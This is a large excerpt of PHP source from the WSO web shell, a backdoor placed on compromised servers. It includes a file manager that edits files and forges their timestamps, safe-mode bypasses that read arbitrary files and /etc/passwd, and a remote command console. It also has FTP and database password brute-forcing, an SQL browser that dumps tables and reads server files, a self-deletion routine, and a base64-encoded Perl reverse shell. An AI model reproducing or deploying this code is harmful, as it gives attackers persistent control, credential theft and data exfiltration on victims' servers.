1216if( !file_exists(@$_POST['p1']) ) {
1217echo 'File not exists';
1218wsoFooter();
1219return;
1220}
1221$uid = @posix_getpwuid(@fileowner($_POST['p1']));
1222if(!$uid) {
1223$uid['name'] = @fileowner($_POST['p1']);
1224$gid['name'] = @filegroup($_POST['p1']);
1225}else $gid = @posix_getgrgid(@filegroup($_POST['p1']));
1226echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?wsoViewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.wsoPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
1227echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
1228if( empty($_POST['p2']) )
1229$_POST['p2'] = 'view';
1230if( is_file($_POST['p1']) )
1231$m = array('View','Highlight','Download','Hexdump','Edit','Chmod','Rename','Touch');
1232else
1233$m = array('Chmod','Rename','Touch');
1234foreach($m as $v)
1235echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
1236echo '<br><br>';
1237switch($_POST['p2']) {
1238case 'view':
1239echo '<pre class=ml1>';
1240$fp = @fopen($_POST['p1'],'r');
1241if($fp) {
1242while( !@feof($fp) )
1243echo htmlspecialchars(@fread($fp,1024));
1244@fclose($fp);
1245}
1246echo '</pre>';
1247break;
1248case 'highlight':
1249if( @is_readable($_POST['p1']) ) {
1250echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
1251$code = @highlight_file($_POST['p1'],true);
1252echo str_replace(array('<span ','</span>'),array('<font ','</font>'),$code).'</div>';
1253}
1254break;
1255case 'chmod':
1256if( !empty($_POST['p3']) ) {
1257$perms = 0;
1258for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
1259$perms += (int)$_POST['p3'][$i]*pow(8,(strlen($_POST['p3'])-$i-1));
1260if(!@chmod($_POST['p1'],$perms))
1261echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
1262}
1263clearstatcache();
1264echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o',fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
1265break;
1266case 'edit':
1267if( !is_writable($_POST['p1'])) {
1268echo 'File isn\'t writeable';
1269break;
1270}
1271if( !empty($_POST['p3']) ) {
1272$time = @filemtime($_POST['p1']);
1273$_POST['p3'] = substr($_POST['p3'],1);
1274$fp = @fopen($_POST['p1'],"w");
1275if($fp) {
1276@fwrite($fp,$_POST['p3']);
1277@fclose($fp);
1278echo 'Saved!<br><script>p3_="";</script>';
1279@touch($_POST['p1'],$time,$time);
1280}
1281}
1282echo '<form onsubmit="g(null,null,null,null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
1283$fp = @fopen($_POST['p1'],'r');
1284if($fp) {
1285while( !@feof($fp) )
1286echo htmlspecialchars(@fread($fp,1024));
1287@fclose($fp);
1288}
1289echo '</textarea><input type=submit value=">>"></form>';
1290break;
1291case 'hexdump':
1292$c = @file_get_contents($_POST['p1']);
1293$n = 0;
1294$h = array('00000000<br>','','');
1295$len = strlen($c);
1296for ($i=0;$i<$len;++$i) {
1297$h[1] .= sprintf('%02X',ord($c[$i])).' ';
1298switch ( ord($c[$i]) ) {
1299case 0: $h[2] .= ' ';break;
1300case 9: $h[2] .= ' ';break;
1301case 10: $h[2] .= ' ';break;
1302case 13: $h[2] .= ' ';break;
1303default: $h[2] .= $c[$i];break;
1304}
1305$n++;
1306if ($n == 32) {
1307$n = 0;
1308if ($i+1 <$len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
1309$h[1] .= '<br>';
1310$h[2] .= "\n";
1311}
1312}
1313echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
1314break;
1315case 'rename':
1316if( !empty($_POST['p3']) ) {
1317if(!@rename($_POST['p1'],$_POST['p3']))
1318echo 'Can\'t rename!<br>';
1319else
1320die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
1321}
1322echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
1323break;
1324case 'touch':
1325if( !empty($_POST['p3']) ) {
1326$time = strtotime($_POST['p3']);
1327if($time) {
1328if(!touch($_POST['p1'],$time,$time))
1329echo 'Fail!';
1330else
1331echo 'Touched!';
1332}else echo 'Bad time format!';
1333}
1334clearstatcache();
1335echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s",@filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
1336break;
1337}
1338echo '</div>';
1339wsoFooter();
1340}
1341function actionSafeMode() {
1342$temp='';
1343ob_start();
1344switch($_POST['p1']) {
1345case 1:
1346$temp=@tempnam($test,'cx');
1347if(@copy("compress.zlib://".$_POST['p2'],$temp)){
1348echo @file_get_contents($temp);
1349unlink($temp);
1350}else
1351echo 'Sorry... Can\'t open file';
1352break;
1353case 2:
1354$files = glob($_POST['p2'].'*');
1355if( is_array($files) )
1356foreach ($files as $filename)
1357echo $filename."\n";
1358break;
1359case 3:
1360$ch = curl_init("file://".$_POST['p2']."\x00".preg_replace('!\(\d+\)\s.*!','','/home/k3030889/public_html/media/temp/30b2c088dc63ae3e97ca260cb16a6c68.txt'));
1361curl_exec($ch);
1362break;
1363case 4:
1364ini_restore("safe_mode");
1365ini_restore("open_basedir");
1366include($_POST['p2']);
1367break;
1368case 5:
1369for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
1370$uid = @posix_getpwuid($_POST['p2']);
1371if ($uid)
1372echo join(':',$uid)."\n";
1373}
1374break;
1375}
1376$temp = ob_get_clean();
1377wsoHeader();
1378echo '<h1>Safe mode bypass</h1><div class=content>';
1379echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>';
1380if($temp)
1381echo '<pre class="ml1" style="margin-top:5px" id="Output">'.htmlspecialchars($temp).'</pre>';
1382echo '</div>';
1383wsoFooter();
1384}
1385function actionConsole() {
1386if(!empty($_POST['p1']) &&!empty($_POST['p2'])) {
1387$_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out'] = true;
1388$_POST['p1'] .= ' 2>&1';
1389}elseif(!empty($_POST['p1']))
1390$_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out'] = false;
1391if(isset($_POST['ajax'])) {
1392$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
1393ob_start();
1394echo "d.cf.cmd.value='';\n";
1395$temp = @iconv($_POST['charset'],'UTF-8',addcslashes("\n$ ".$_POST['p1']."\n".wsoEx($_POST['p1']),"\n\r\t\\'\0"));
1396if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
1397if(@chdir($match[1])) {
1398$GLOBALS['cwd'] = @getcwd();
1399echo "c_='".$GLOBALS['cwd']."';";
1400}
1401}
1402echo "d.cf.output.value+='".$temp."';";
1403echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";
1404$temp = ob_get_clean();
1405echo strlen($temp),"\n",$temp;
1406exit;
1407}
1408wsoHeader();
1409echo "<script>
1410if(window.Event) window.captureEvents(Event.KEYDOWN);
1411var cmds = new Array('');
1412var cur = 0;
1413function kp(e) {
1414 var n = (window.Event) ? e.which : e.keyCode;
1415 if(n == 38) {
1416 cur--;
1417 if(cur>=0)
1418 document.cf.cmd.value = cmds[cur];
1419 else
1420 cur++;
1421 } else if(n == 40) {
1422 cur++;
1423 if(cur < cmds.length)
1424 document.cf.cmd.value = cmds[cur];
1425 else
1426 cur--;
1427 }
1428}
1429function add(cmd) {
1430 cmds.pop();
1431 cmds.push(cmd);
1432 cmds.push('');
1433 cur = cmds.length-1;
1434}
1435
1436</script>";
1437echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>';
1438foreach($GLOBALS['aliases'] as $n =>$v) {
1439if($v == '') {
1440echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
1441continue;
1442}
1443echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
1444}
1445if(empty($_POST['ajax'])&&!empty($_POST['p1']))
1446$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
1447echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 '.(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
1448if(!empty($_POST['p1'])) {
1449echo htmlspecialchars("$ ".$_POST['p1']."\n".wsoEx($_POST['p1']));
1450}
1451echo '</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>';
1452echo '</form></div><script>d.cf.cmd.focus();</script>';
1453wsoFooter();
1454}
1455function actionLogout() {
1456session_destroy();
1457die('bye!');
1458}
1459function actionSelfRemove() {
1460if($_POST['p1'] == 'yes')
1461if(@unlink(preg_replace('!\(\d+\)\s.*!','','/home/k3030889/public_html/media/temp/30b2c088dc63ae3e97ca260cb16a6c68.txt')))
1462die('Shell has been removed');
1463else
1464echo 'unlink error!';
1465if($_POST['p1'] != 'yes')
1466wsoHeader();
1467echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
1468wsoFooter();
1469}
1470function actionBruteforce() {
1471wsoHeader();
1472if( isset($_POST['proto']) ) {
1473echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
1474if( $_POST['proto'] == 'ftp') {
1475function bruteForce($ip,$port,$login,$pass) {
1476$fp = @ftp_connect($ip,$port?$port:21);
1477if(!$fp) return false;
1478$res = @ftp_login($fp,$login,$pass);
1479@ftp_close($fp);
1480return $res;
1481}
1482}elseif( $_POST['proto'] == 'mysql') {
1483function bruteForce($ip,$port,$login,$pass) {
1484$res = @mysql_connect($ip.':'.$port?$port:3306,$login,$pass);
1485@mysql_close($res);
1486return $res;
1487}
1488}elseif( $_POST['proto'] == 'pgsql') {
1489function bruteForce($ip,$port,$login,$pass) {
1490$str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
1491$res = @pg_connect($str);
1492@pg_close($res);
1493return $res;
1494}
1495}
1496$success = 0;
1497$attempts = 0;
1498$server = explode(":",$_POST['server']);
1499if($_POST['type'] == 1) {
1500$temp = @file('/etc/passwd');
1501if( is_array($temp) )
1502foreach($temp as $line) {
1503$line = explode(":",$line);
1504++$attempts;
1505if( bruteForce(@$server[0],@$server[1],$line[0],$line[0]) ) {
1506$success++;
1507echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
1508}
1509if(@$_POST['reverse']) {
1510$tmp = "";
1511for($i=strlen($line[0])-1;$i>=0;--$i)
1512$tmp .= $line[0][$i];
1513++$attempts;
1514if( bruteForce(@$server[0],@$server[1],$line[0],$tmp) ) {
1515$success++;
1516echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
1517}
1518}
1519}
1520}elseif($_POST['type'] == 2) {
1521$temp = @file($_POST['dict']);
1522if( is_array($temp) )
1523foreach($temp as $line) {
1524$line = trim($line);
1525++$attempts;
1526if( bruteForce($server[0],@$server[1],$_POST['login'],$line) ) {
1527$success++;
1528echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
1529}
1530}
1531}
1532echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
1533}
1534echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
1535.'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
1536.'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
1537.'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
1538.'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
1539.'<span>Server:port</span></td>'
1540.'<td><input type=text name=server value="127.0.0.1"></td></tr>'
1541.'<tr><td><span>Brute type</span></td>'
1542.'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
1543.'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
1544.'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
1545.'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
1546.'<td><input type=text name=login value="root"></td></tr>'
1547.'<tr><td><span>Dictionary</span></td>'
1548.'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
1549.'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
1550echo '</div><br>';
1551wsoFooter();
1552}
1553function actionSql() {
1554class DbClass {
1555var $type;
1556var $link;
1557var $res;
1558function DbClass($type) {
1559$this->type = $type;
1560}
1561function connect($host,$user,$pass,$dbname){
1562switch($this->type) {
1563case 'mysql':
1564if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
1565break;
1566case 'pgsql':
1567$host = explode(':',$host);
1568if(!$host[1]) $host[1]=5432;
1569if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
1570break;
1571}
1572return false;
1573}
1574function selectdb($db) {
1575switch($this->type) {
1576case 'mysql':
1577if (@mysql_select_db($db))return true;
1578break;
1579}
1580return false;
1581}
1582function query($str) {
1583switch($this->type) {
1584case 'mysql':
1585return $this->res = @mysql_query($str);
1586break;
1587case 'pgsql':
1588return $this->res = @pg_query($this->link,$str);
1589break;
1590}
1591return false;
1592}
1593function fetch() {
1594$res = func_num_args()?func_get_arg(0):$this->res;
1595switch($this->type) {
1596case 'mysql':
1597return @mysql_fetch_assoc($res);
1598break;
1599case 'pgsql':
1600return @pg_fetch_assoc($res);
1601break;
1602}
1603return false;
1604}
1605function listDbs() {
1606switch($this->type) {
1607case 'mysql':
1608return $this->query("SHOW databases");
1609break;
1610case 'pgsql':
1611return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
1612break;
1613}
1614return false;
1615}
1616function listTables() {
1617switch($this->type) {
1618case 'mysql':
1619return $this->res = $this->query('SHOW TABLES');
1620break;
1621case 'pgsql':
1622return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
1623break;
1624}
1625return false;
1626}
1627function error() {
1628switch($this->type) {
1629case 'mysql':
1630return @mysql_error();
1631break;
1632case 'pgsql':
1633return @pg_last_error();
1634break;
1635}
1636return false;
1637}
1638function setCharset($str) {
1639switch($this->type) {
1640case 'mysql':
1641if(function_exists('mysql_set_charset'))
1642return @mysql_set_charset($str,$this->link);
1643else
1644$this->query('SET CHARSET '.$str);
1645break;
1646case 'pgsql':
1647return @pg_set_client_encoding($this->link,$str);
1648break;
1649}
1650return false;
1651}
1652function loadFile($str) {
1653switch($this->type) {
1654case 'mysql':
1655return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
1656break;
1657case 'pgsql':
1658$this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '".addslashes($str)."';select file from wso2;");
1659$r=array();
1660while($i=$this->fetch())
1661$r[] = $i['file'];
1662$this->query('drop table wso2');
1663return array('file'=>implode("\n",$r));
1664break;
1665}
1666return false;
1667}
1668function dump($table,$fp = false) {
1669switch($this->type) {
1670case 'mysql':
1671$res = $this->query('SHOW CREATE TABLE `'.$table.'`');
1672$create = mysql_fetch_array($res);
1673$sql = $create[1].";\n";
1674if($fp) fwrite($fp,$sql);else echo($sql);
1675$this->query('SELECT * FROM `'.$table.'`');
1676$head = true;
1677while($item = $this->fetch()) {
1678$columns = array();
1679foreach($item as $k=>$v) {
1680if($v == null)
1681$item[$k] = "NULL";
1682elseif(is_numeric($v))
1683$item[$k] = $v;
1684else
1685$item[$k] = "'".@mysql_real_escape_string($v)."'";
1686$columns[] = "`".$k."`";
1687}
1688if($head) {
1689$sql = 'INSERT INTO `'.$table.'` ('.implode(", ",$columns).") VALUES \n\t(".implode(", ",$item).')';
1690$head = false;
1691}else
1692$sql = "\n\t,(".implode(", ",$item).')';
1693if($fp) fwrite($fp,$sql);else echo($sql);
1694}
1695if(!$head)
1696if($fp) fwrite($fp,";\n\n");else echo(";\n\n");
1697break;
1698case 'pgsql':
1699$this->query('SELECT * FROM '.$table);
1700while($item = $this->fetch()) {
1701$columns = array();
1702foreach($item as $k=>$v) {
1703$item[$k] = "'".addslashes($v)."'";
1704$columns[] = $k;
1705}
1706$sql = 'INSERT INTO '.$table.' ('.implode(", ",$columns).') VALUES ('.implode(", ",$item).');'."\n";
1707if($fp) fwrite($fp,$sql);else echo($sql);
1708}
1709break;
1710}
1711return false;
1712}
1713};
1714$db = new DbClass($_POST['type']);
1715if(@$_POST['p2']=='download') {
1716$db->connect($_POST['sql_host'],$_POST['sql_login'],$_POST['sql_pass'],$_POST['sql_base']);
1717$db->selectdb($_POST['sql_base']);
1718switch($_POST['charset']) {
1719case "Windows-1251": $db->setCharset('cp1251');break;
1720case "UTF-8": $db->setCharset('utf8');break;
1721case "KOI8-R": $db->setCharset('koi8r');break;
1722case "KOI8-U": $db->setCharset('koi8u');break;
1723case "cp866": $db->setCharset('cp866');break;
1724}
1725if(empty($_POST['file'])) {
1726ob_start("ob_gzhandler",4096);
1727header("Content-Disposition: attachment; filename=dump.sql");
1728header("Content-Type: text/plain");
1729foreach($_POST['tbl'] as $v)
1730$db->dump($v);
1731exit;
1732}elseif($fp = @fopen($_POST['file'],'w')) {
1733foreach($_POST['tbl'] as $v)
1734$db->dump($v,$fp);
1735fclose($fp);
1736unset($_POST['p2']);
1737}else
1738die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');
1739}
1740wsoHeader();
1741echo "
1742
1743<h1>Sql browser</h1><div class=content>
1744<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
1745<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
1746<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='".htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='".(isset($_POST['charset'])?$_POST['charset']:'') ."'>
1747<td><select name='type'><option value='mysql' ";
1748if(@$_POST['type']=='mysql')echo 'selected';
1749echo ">MySql</option><option value='pgsql' ";
1750if(@$_POST['type']=='pgsql')echo 'selected';
1751echo ">PostgreSql</option></select></td>
1752<td><input type=text name=sql_host value='".(empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."'></td>
1753<td><input type=text name=sql_login value='".(empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."'></td>
1754<td><input type=text name=sql_pass value='".(empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."'></td><td>";
1755$tmp = "<input type=text name=sql_base value=''>";
1756if(isset($_POST['sql_host'])){
1757if($db->connect($_POST['sql_host'],$_POST['sql_login'],$_POST['sql_pass'],$_POST['sql_base'])) {
1758switch($_POST['charset']) {
1759case "Windows-1251": $db->setCharset('cp1251');break;
1760case "UTF-8": $db->setCharset('utf8');break;
1761case "KOI8-R": $db->setCharset('koi8r');break;
1762case "KOI8-U": $db->setCharset('koi8u');break;
1763case "cp866": $db->setCharset('cp866');break;
1764}
1765$db->listDbs();
1766echo "<select name=sql_base><option value=''></option>";
1767while($item = $db->fetch()) {
1768list($key,$value) = each($item);
1769echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
1770}
1771echo '</select>';
1772}
1773else echo $tmp;
1774}else
1775echo $tmp;
1776echo "</td>
1777
1778 <td><input type=submit value='>>' onclick='fs(d.sf);'></td>
1779 <td><input type=checkbox name=sql_count value='on'".(empty($_POST['sql_count'])?'':' checked') ."> count the number of rows</td>
1780 </tr>
1781 </table>
1782 <script>
1783 s_db='".@addslashes($_POST['sql_base'])."';
1784 function fs(f) {
1785 if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
1786 if(f.p1) f.p1.value='';
1787 if(f.p2) f.p2.value='';
1788 if(f.p3) f.p3.value='';
1789 }
1790 }
1791 function st(t,l) {
1792 d.sf.p1.value = 'select';
1793 d.sf.p2.value = t;
1794 if(l && d.sf.p3) d.sf.p3.value = l;
1795 d.sf.submit();
1796 }
1797 function is() {
1798 for(i=0;i<d.sf.elements['tbl[]'].length;++i)
1799 d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
1800 }
1801 </script>";
1802if(isset($db) &&$db->link){
1803echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
1804if(!empty($_POST['sql_base'])){
1805$db->selectdb($_POST['sql_base']);
1806echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
1807$tbls_res = $db->listTables();
1808while($item = $db->fetch($tbls_res)) {
1809list($key,$value) = each($item);
1810if(!empty($_POST['sql_count']))
1811$n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
1812$value = htmlspecialchars($value);
1813echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'> <a href=# onclick=\"st('".$value."',1)\">".$value."</a>".(empty($_POST['sql_count'])?' ':" <small>({$n['n']})</small>") ."</nobr><br>";
1814}
1815echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
1816if(@$_POST['p1'] == 'select') {
1817$_POST['p1'] = 'query';
1818$_POST['p3'] = $_POST['p3']?$_POST['p3']:1;
1819$db->query('SELECT COUNT(*) as n FROM '.$_POST['p2']);
1820$num = $db->fetch();
1821$pages = ceil($num['n'] / 30);
1822echo "<script>d.sf.onsubmit=function(){st(\"".$_POST['p2'] ."\", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=".((int)$_POST['p3']) .">";
1823echo " of $pages";
1824if($_POST['p3'] >1)
1825echo " <a href=# onclick='st(\"".$_POST['p2'] .'", '.($_POST['p3']-1) .")'>< Prev</a>";
1826if($_POST['p3'] <$pages)
1827echo " <a href=# onclick='st(\"".$_POST['p2'] .'", '.($_POST['p3']+1) .")'>Next ></a>";
1828$_POST['p3']--;
1829if($_POST['type']=='pgsql')
1830$_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
1831else
1832$_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
1833echo "<br><br>";
1834}
1835if((@$_POST['p1'] == 'query') &&!empty($_POST['p2'])) {
1836$db->query(@$_POST['p2']);
1837if($db->res !== false) {
1838$title = false;
1839echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">';
1840$line = 1;
1841while($item = $db->fetch()) {
1842if(!$title) {
1843echo '<tr>';
1844foreach($item as $key =>$value)
1845echo '<th>'.$key.'</th>';
1846reset($item);
1847$title=true;
1848echo '</tr><tr>';
1849$line = 2;
1850}
1851echo '<tr class="l'.$line.'">';
1852$line = $line==1?2:1;
1853foreach($item as $key =>$value) {
1854if($value == null)
1855echo '<td><i>null</i></td>';
1856else
1857echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
1858}
1859echo '</tr>';
1860}
1861echo '</table>';
1862}else {
1863echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
1864}
1865}
1866echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
1867if(!empty($_POST['p2']) &&($_POST['p1'] != 'loadfile'))
1868echo htmlspecialchars($_POST['p2']);
1869echo "</textarea><br/><input type=submit value='Execute'>";
1870echo "</td></tr>";
1871}
1872echo "</table></form><br/>";
1873if($_POST['type']=='mysql') {
1874$db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
1875if($db->fetch())
1876echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
1877}
1878if(@$_POST['p1'] == 'loadfile') {
1879$file = $db->loadFile($_POST['p2']);
1880echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
1881}
1882}else {
1883echo htmlspecialchars($db->error());
1884}
1885echo '</div>';
1886wsoFooter();
1887}
1888function actionNetwork() {
1889wsoHeader();
1890$back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
